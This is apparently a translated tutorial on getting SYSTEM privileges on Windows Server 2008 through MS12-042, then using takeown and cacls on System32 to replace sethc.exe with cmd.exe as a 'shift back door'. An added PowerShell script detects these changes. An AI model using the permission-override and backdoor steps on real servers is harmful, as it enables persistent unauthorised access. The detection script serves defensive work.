As is well known, permissions on Windows Server 2008 are very strict, and the overflow tools commonly used against Server 2003 fail. When connections are restricted by IP, obtaining SYSTEM privileges and having an account still does not get us in; in this situation the only options are a shift back door or the magnifier. However, on 2008 even SYSTEM cannot operate on the system folders.
First check the privileges of the logged-in account with whoami. As we can see, it has ordinary privileges.
Here I use MS12-042, that is, sysret.exe, which is a separate story.
We find the PID of w3wp.exe and execute the following command.
This performs the privilege escalation.
We can see that we now have SYSTEM privileges.
Next, use the following command to replace sethc.exe with cmd, so that later, pressing Shift five times on the remote server brings up cmd.
But access is denied.
In this case, we need to change the owner of all files and folders under the directory, including those in subfolders, to the Administrators group, with this command:
    takeown /f c:\windows\system32\*.* /a /r /d y
Then execute:
    cacls c:\windows\system32\*.* /t /e /g administrators:f
The NTFS permissions of the files and subfolders in the directory are modified so that only the Administrators group has Full Control.
Then check the system folder permissions.
Then you can replace sethc.exe.
However, only the Administrators group has permission now, and we only have SYSTEM privileges, so SYSTEM still cannot operate on the system folders.
So we run the following command:
    cacls c:\windows\system32\*.* /t /e /g system:f
Now we've successfully installed the shift back door.
Windows Server 2008 privilege escalation: breaking through SYSTEM permission limits to install a shift back door
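A defender-side check for the changes described above, as an added example that is not part of the original post. It flags sethc.exe or the magnifier binary when its content matches cmd.exe, when its owner is no longer TrustedInstaller, or when Administrators or SYSTEM hold Full Control on it. Assumptions: PowerShell 4.0 or later (for Get-FileHash), the magnifier file name Magnify.exe, and a default install where these files are owned by TrustedInstaller and grant Administrators and SYSTEM only read/execute.

```powershell
# Added example, not from the original post. Run on the host being checked.
# Assumes PowerShell 4.0+ and default System32 ACLs (TrustedInstaller owner).
$sys32   = Join-Path $env:SystemRoot 'System32'
$targets = 'sethc.exe', 'Magnify.exe'   # the two binaries the post names
$sidType = [System.Security.Principal.SecurityIdentifier]
$full    = [System.Security.AccessControl.FileSystemRights]::FullControl

# Well-known SIDs, so the check works regardless of OS display language.
$trustedInstaller = 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
$watchedSids = @{
    'S-1-5-32-544' = 'BUILTIN\Administrators'
    'S-1-5-18'     = 'NT AUTHORITY\SYSTEM'
}

$cmdHash = (Get-FileHash -LiteralPath (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash

foreach ($name in $targets) {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path -LiteralPath $path)) {
        [pscustomobject]@{ File = $name; Finding = 'file missing' }
        continue
    }

    $findings = @()

    # Indicator 1: the accessibility binary is a byte-for-byte copy of cmd.exe.
    if ((Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash -eq $cmdHash) {
        $findings += 'content is identical to cmd.exe'
    }

    # Indicator 2: ownership was taken away from TrustedInstaller (takeown /a).
    $acl   = Get-Acl -LiteralPath $path
    $owner = $acl.GetOwner($sidType).Value
    if ($owner -ne $trustedInstaller) {
        $findings += "owner is $owner instead of TrustedInstaller"
    }

    # Indicator 3: Full Control granted to Administrators or SYSTEM (cacls /g ...:f).
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $watchedSids.ContainsKey($sid) -and
            ($ace.FileSystemRights -band $full) -eq $full) {
            $findings += "$($watchedSids[$sid]) has Full Control"
        }
    }

    if (-not $findings) { $findings = @('no indicators') }
    [pscustomobject]@{ File = $name; Finding = $findings -join '; ' }
}
```

Because the commands in the post are applied recursively to all of System32, an ownership or Full Control finding on these two files suggests the rest of the directory's ACLs need review as well.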